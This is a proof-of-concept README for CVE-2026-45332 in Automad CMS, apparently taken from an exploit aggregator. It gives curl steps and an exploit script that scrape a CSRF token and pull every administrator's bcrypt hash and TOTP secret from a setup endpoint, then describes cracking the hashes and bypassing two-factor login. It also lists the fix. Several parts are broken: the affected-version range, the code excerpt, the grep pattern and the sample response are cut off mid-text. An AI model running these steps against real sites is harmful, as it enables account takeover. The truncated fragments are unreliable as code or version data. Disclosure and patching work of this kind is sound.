## https://sploitus.com/exploit?id=C21DAAE1-B419-5788-B35E-CE7E357E7438
# CVE-2026-45332 โ Broken Access Control in Automad CMS
Proof of concept for **CVE-2026-45332**, a Broken Access Control vulnerability in [Automad CMS](https://github.com/marcantondahmen/automad) that allows any unauthenticated attacker to dump the bcrypt password hash and TOTP secret of every administrator account through the setup endpoint, which is never disabled after initial configuration.
| Field | Value |
|---|---|
| **CVE** | [CVE-2026-45332](https://vulners.com/cve/CVE-2026-45332) |
| **GHSA** | [GHSA-xm76-r88j-vm3g](https://github.com/advisories/GHSA-xm76-r88j-vm3g) |
| **Product** | Automad CMS (composer `automad/automad`) |
| **Affected** | `>= 2.0.0-alpha.1`, `generatePHP(); // serializes every user including hashes
return $Response->setData(array(
'php' => $php, // credential hashes returned in response
'configDir' => dirname(UserCollection::FILE_ACCOUNTS) // absolute path leaked
));
}
```
`User::__serialize()` includes the private `passwordHash` and `totpSecret` fields, so they end up embedded in the serialized output that is returned to the caller.
Full technical write-up: **[PoC.md](./PoC.md)**.
## Proof of concept
The endpoint requires a valid CSRF token, which is freely available in the source of the public login page. An automated exploit is provided in [`exploit.sh`](./exploit.sh):
```bash
./exploit.sh http://localhost:80
```
Manual reproduction:
```bash
# 1. Grab a session cookie and the CSRF token from the public login page
JAR=$(mktemp)
CSRF=$(curl -sc "$JAR" http://localhost:80/dashboard/login \
| grep -oP '(?\" ... \"totpSecret\";s:N:\"\" ...",
"filename": "accounts.php",
"configDir": "/path/to/config"
}
}
```
The bcrypt hashes can then be cracked offline (Hashcat / John). On `2.0.0-beta.27` the leaked TOTP secret bypasses two-factor authentication outright.
## Impact
An unauthenticated remote attacker can:
1. Retrieve the bcrypt hash of every administrator and crack it offline.
2. Retrieve TOTP secrets and bypass 2FA (`2.0.0-beta.27`).
3. Learn the absolute server filesystem path, aiding further attacks.
## Remediation
Update to **Automad 2.0.0-beta.28** or later, which restricts the endpoint once initial setup is complete. As a temporary mitigation, block requests to `/_api/user-collection/create-first-user` at the web server or WAF.
## References
- [CVE.org โ CVE-2026-45332](https://vulners.com/cve/CVE-2026-45332)
- [GitHub Advisory โ GHSA-xm76-r88j-vm3g](https://github.com/advisories/GHSA-xm76-r88j-vm3g)
- [Automad CMS](https://github.com/marcantondahmen/automad)
- [Broken Access Control โ OWASP](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
> Disclosed responsibly. For educational and defensive purposes only.